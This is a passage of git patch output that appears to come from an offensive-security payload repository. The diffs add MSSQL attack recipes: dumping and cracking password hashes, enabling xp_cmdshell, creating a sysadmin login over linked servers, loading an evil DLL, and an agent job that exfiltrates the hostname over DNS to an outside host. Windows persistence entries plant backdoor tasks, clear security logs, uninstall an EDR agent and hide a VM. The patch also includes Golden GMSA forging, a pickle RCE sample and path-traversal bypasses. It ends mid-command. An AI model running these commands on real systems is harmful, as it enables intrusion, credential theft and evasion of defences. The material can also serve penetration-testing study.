Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -54,6 +54,7 @@ * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) * [Exploiting Impersonation](#exploiting-impersonation) * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) + * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) * [References](#references) ## Identify Instances and Databases @@ -537,6 +538,21 @@ SELECT ORIGINAL_LOGIN() SELECT SYSTEM_USER ``` +### MSSQL Accounts and Hashes + +```sql +SELECT name, password_hash FROM sys.sql_logins +``` + +Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` + +```ps1 +131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 +132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe +1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 +``` + + ## References * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8743b0f..7aa2995 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -14,6 +14,7 @@ * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) + * [LAPS Settings](#laps-settings) * [HiveNightmare](#hivenightmare) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) @@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash. +### LAPS Settings + +Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. + +* LAPS Enabled: AdmPwdEnabled +* LAPS Admin Account Name: AdminAccountName +* LAPS Password Complexity: PasswordComplexity +* LAPS Password Length: PasswordLength +* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled ### HiveNightmare From 4abd52697f2fb9be94e0d785c77e4af5119efcd0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 10 Mar 2022 11:05:17 +0100 Subject: [PATCH 38/50] MSSQL Agent Command Execution --- Directory Traversal/README.md | 10 ++ .../Active Directory Attack.md | 7 +- .../MSSQL Server - Cheatsheet.md | 99 +++++++++++++++++-- .../Windows - Persistence.md | 8 ++ SQL Injection/MSSQL Injection.md | 2 +- 5 files changed, 113 insertions(+), 13 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index e459021..665af6c 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### Java Bypass + +Bypass Java's URL protocol + +```powershell +url:file:///etc/passwd +url:http://127.0.0.1:8080 +``` + + ## Path Traversal ### Interesting Linux files diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ef83864..5df6bc9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt Useful when you want to have the clear text password or when you need to make stats about weak passwords. Recommended wordlists: -- rockyou (available in Kali Linux) -- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- Weakpass.com +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell @@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- ~~[hashes.org](https://hashes.org/check.php)~~ - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 7c693f0..cfd9e9c 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -14,6 +14,8 @@ * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) @@ -22,7 +24,7 @@ * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) @@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv ## Linked Database +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ### Crawl Links for Instances in the Domain A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results @@ -195,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque ``` -### Command Execution via xp_cmdshell +## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami -Creates and adds local user backup to the local administrators group: -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 +# Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + ## CLR Assemblies Prerequisites: @@ -322,6 +384,8 @@ GO ## OLE Automation +* :warning: Disabled by default + ### Execute commands using OLE automation procedures ```ps1 @@ -365,9 +429,21 @@ Subsystem Options: –Subsystem Jscript ``` +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + ### List All Jobs ```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` @@ -541,7 +617,13 @@ SELECT SYSTEM_USER ### MSSQL Accounts and Hashes ```sql -SELECT name, password_hash FROM sys.sql_logins +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` @@ -557,4 +639,5 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat. * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5e3c9a2..e6a93a0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -8,6 +8,7 @@ * [Antivirus Removal](#antivirus-removal) * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) + * [Clear System and Security Logs](#clear-system-and-security-logs) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP ``` +### Clear System and Security Logs + +```powershell +cmd.exe /c wevtutil.exe cl System +cmd.exe /c wevtutil.exe cl Security +``` + ## Simple User Set a file as hidden diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 1ee72f9..920e2ac 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` ## MSSQL Union Based From d40e0556291289964936e8ed5304d2ac0de925fe Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 15 Mar 2022 11:15:44 +0100 Subject: [PATCH 39/50] Golden GMSA + Scheduled Task --- Account Takeover/README.md | 8 ++ .../Active Directory Attack.md | 99 ++++++++++++------- .../Windows - Persistence.md | 56 ++++++----- 3 files changed, 102 insertions(+), 61 deletions(-) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 8bc027e..23afbe2 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -10,6 +10,7 @@ * [Weak Password Reset Token](#weak-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset Via Username Collision](#password-reset-via-username-collision) + * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) @@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t The platform CTFd was vulnerable to this attack. See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) + +### Account takeover due to unicode normalization issue + +- Victim account: `demo@gmail.com` +- Attacker account: `demⓞ@gmail.com` + + ## Account Takeover Via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 5df6bc9..527b4f8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -48,6 +48,7 @@ - [Password in AD User comment](#password-in-ad-user-comment) - [Reading LAPS Password](#reading-laps-password) - [Reading GMSA Password](#reading-gmsa-password) + - [Forging Golden GMSA](#forging-golden-gmsa) - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - [Using Mimikatz](#using-mimikatz) - [Using Meterpreter](#using-meterpreter) @@ -1389,40 +1390,7 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### Reading GMSA Password -> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. - -#### GMSA Attributes in the Active Directory -* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. -* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. -* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. -* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. - - -#### Extract NT hash from the Active Directory - -* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) - ```ps1 - # https://github.com/rvazarkar/GMSAPasswordReader - GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT - ``` - -* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) - ```powershell - # https://github.com/micahvandeusen/gMSADumper - python3 gMSADumper.py -u User -p Password1 -d domain.local - ``` - -* Active Directory Powershell - ```ps1 - $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' - $blob = $gmsa.'msDS-ManagedPassword' - $mp = ConvertFrom-ADManagedPasswordBlob $blob - $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword - ``` - -* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module ### Reading LAPS Password @@ -1470,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} ``` - - From linux: + - From Linux: * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: ```bash @@ -1496,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` ``` + +### Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. + +#### GMSA Attributes in the Active Directory +* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. +* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. +* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +#### Extract NT hash from the Active Directory + +* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) + ```ps1 + # https://github.com/rvazarkar/GMSAPasswordReader + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) + ```powershell + # https://github.com/micahvandeusen/gMSADumper + python3 gMSADumper.py -u User -p Password1 -d domain.local + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + + +### Forging Golden GMSA + +> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. + +* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) + ```ps1 + # Enumerate all gMSAs + GoldenGMSA.exe gmsainfo + # Query for a specific gMSA + GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 + + # Dump all KDS Root Keys + GoldenGMSA.exe kdsinfo + # Dump a specific KDS Root Key + GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb + + # Compute gMSA password + # --sid : SID of the gMSA (required) + # --kdskey : Base64 encoded KDS Root Key + # --pwdid : Base64 of msds-ManagedPasswordID attribute value + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode + ``` + ### Pass-the-Ticket Golden Tickets Forging a TGT require the `krbtgt` NTLM hash @@ -3555,3 +3585,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index e6a93a0..eb5f135 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -146,36 +146,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" - ### Scheduled Tasks User -Using native **schtask** +* Using native **schtask** - Create a new task + ```powershell + # Create the scheduled tasks to run once at 00.00 + schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe + # Force run it now ! + schtasks /run /tn "Device-Synchronize" + ``` +* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks + ```powershell + # Launch an executable by calling the ShellExec_RunDLL function. + SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE + ``` -```powershell -# Create the scheduled tasks to run once at 00.00 -schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe -# Force run it now ! -schtasks /run /tn "Device-Synchronize" -``` +* Using Powershell + ```powershell + PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" + PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" + PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" + PS C:\> $S = New-ScheduledTaskSettingsSet + PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S + PS C:\> Register-ScheduledTask Backdoor -InputObject $D + ``` -Using Powershell +* Using SharPersist + ```powershell + # Add to a current scheduled task + SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add -```powershell -PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" -PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" -PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" -PS C:\> $S = New-ScheduledTaskSettingsSet -PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S -PS C:\> Register-ScheduledTask Backdoor -InputObject $D -``` - -Using SharPersist - -```powershell -# Add to a current scheduled task -SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add - -# Add new task -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly -``` + # Add new task + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly + ``` ### BITS Jobs From df8493e4e67fedfa8059721563d8220abebd4195 Mon Sep 17 00:00:00 2001 From: nerrorsec <42860825+nerrorsec@users.noreply.github.com> Date: Thu, 24 Mar 2022 11:54:34 +0545 Subject: [PATCH 40/50] import os --- Insecure Deserialization/Python.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 41887f6..98e843e 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. ```python -import cPickle +import cPickle, os from base64 import b64encode, b64decode class Evil(object): @@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token) ## References * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) -* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) \ No newline at end of file +* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) From 89f0b93d43954bcc3858aaae306b392d33b9a4a1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 27 Mar 2022 19:50:33 +0200 Subject: [PATCH 41/50] Elastic EDR + VM Persistence --- .../MSSQL Server - Cheatsheet.md | 1 + .../Windows - Persistence.md | 57 +++++++++++++++++++ Upload Insecure Files/README.md | 22 +++---- 3 files changed, 69 insertions(+), 11 deletions(-) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index cfd9e9c..860d5b0 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -444,6 +444,7 @@ EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; ```ps1 SELECT job_id, [name] FROM msdb.dbo.sysjobs; +SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index eb5f135..a95bd6f 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -32,6 +32,7 @@ * [sethc.exe](#sethc.exe) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) + * [Virtual Machines](#virtual-machines) * [Domain](#domain) * [Golden Certificate](#golden-certificate) * [Golden Ticket](#golden-ticket) @@ -56,6 +57,13 @@ PS> attrib +h mimikatz.exe * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/) * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html) +* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html) + ```ps1 + cd "C:\Program Files\Elastic\Agent\" + PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall + Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y + Elastic Agent has been uninstalled. + ``` ### Disable Windows Defender @@ -403,6 +411,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator ``` + +### Virtual Machines + +> Based on the Shadow Bunny technique. + +```ps1 +# download virtualbox +Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe + +# perform a silent install and avoid creating desktop and quick launch icons +VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 + +# in \Program Files\Oracle\VirtualBox\VBoxManage.exe +# Disabling notifications +.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" + +# Download the Virtual machine disk +Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd + +# Create a new VM +$vmname = "IT Recovery" +.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register + +# Add a network card in NAT mode +.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit +.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128 +.\VBoxManage.exe modifyvm $vmname --nic1 nat +.\VBoxManage.exe modifyvm $vmname --audio none +.\VBoxManage.exe modifyvm $vmname 